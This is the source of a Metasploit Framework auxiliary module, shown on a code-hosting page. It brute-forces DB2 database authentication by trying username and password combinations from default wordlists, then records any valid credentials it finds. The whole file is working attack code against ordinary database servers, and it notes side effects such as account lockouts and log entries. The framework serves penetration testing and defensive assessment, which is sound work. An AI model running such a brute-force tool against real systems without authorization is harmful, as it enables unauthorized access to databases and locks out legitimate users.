Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/db2/db2_auth.rb
19514 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'metasploit/framework/credential_collection'

7
require 'metasploit/framework/login_scanner/db2'

8


9
class MetasploitModule < Msf::Auxiliary

10
  include Msf::Exploit::Remote::DB2

11
  include Msf::Auxiliary::AuthBrute

12
  include Msf::Auxiliary::Scanner

13
  include Msf::Auxiliary::Report

14


15
  def initialize

16
    super(

17
      'Name' => 'DB2 Authentication Brute Force Utility',

18
      'Description' => %q{

19
        This module attempts to authenticate against a DB2 instance

20
        using username and password combinations indicated by the

21
        USER_FILE, PASS_FILE, and USERPASS_FILE options.

22
      },

23
      'Author' => ['todb'],

24
      'References' => [

25
        [ 'CVE', '1999-0502'] # Weak password

26
      ],

27
      'License' => MSF_LICENSE,

28
      'Notes' => {

29
        'Stability' => [CRASH_SAFE],

30
        'SideEffects' => [IOC_IN_LOGS, ACCOUNT_LOCKOUTS],

31
        'Reliability' => []

32
      }

33
    )

34


35
    register_options(

36
      [

37
        Opt::Proxies,

38
        OptPath.new('USERPASS_FILE', [

39
          false, 'File containing (space-separated) users and passwords, one pair per line',

40
          File.join(Msf::Config.data_directory, 'wordlists', 'db2_default_userpass.txt')

41
        ]),

42
        OptPath.new('USER_FILE', [

43
          false, 'File containing users, one per line',

44
          File.join(Msf::Config.data_directory, 'wordlists', 'db2_default_user.txt')

45
        ]),

46
        OptPath.new('PASS_FILE', [

47
          false, 'File containing passwords, one per line',

48
          File.join(Msf::Config.data_directory, 'wordlists', 'db2_default_pass.txt')

49
        ]),

50
      ]

51
    )

52
  end

53


54
  def run_host(ip)

55
    cred_collection = build_credential_collection(

56
      realm: datastore['DATABASE'],

57
      username: datastore['USERNAME'],

58
      password: datastore['PASSWORD']

59
    )

60


61
    scanner = Metasploit::Framework::LoginScanner::DB2.new(

62
      configure_login_scanner(

63
        host: ip,

64
        port: rport,

65
        proxies: datastore['PROXIES'],

66
        cred_details: cred_collection,

67
        stop_on_success: datastore['STOP_ON_SUCCESS'],

68
        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],

69
        connection_timeout: 30,

70
        max_send_size: datastore['TCP::max_send_size'],

71
        send_delay: datastore['TCP::send_delay'],

72
        framework: framework,

73
        framework_module: self,

74
        ssl: datastore['SSL'],

75
        ssl_version: datastore['SSLVersion'],

76
        ssl_verify_mode: datastore['SSLVerifyMode'],

77
        ssl_cipher: datastore['SSLCipher'],

78
        local_port: datastore['CPORT'],

79
        local_host: datastore['CHOST']

80
      )

81
    )

82


83
    scanner.scan! do |result|

84
      credential_data = result.to_h

85
      credential_data.merge!(

86
        module_fullname: fullname,

87
        workspace_id: myworkspace_id

88
      )

89
      if result.success?

90
        credential_core = create_credential(credential_data)

91
        credential_data[:core] = credential_core

92
        create_credential_login(credential_data)

93


94
        print_good "#{ip}:#{rport} - Login Successful: #{result.credential}"

95
      else

96
        invalidate_login(credential_data)

97
        vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"

98
      end

99
    end

100
  end

101
end

102


103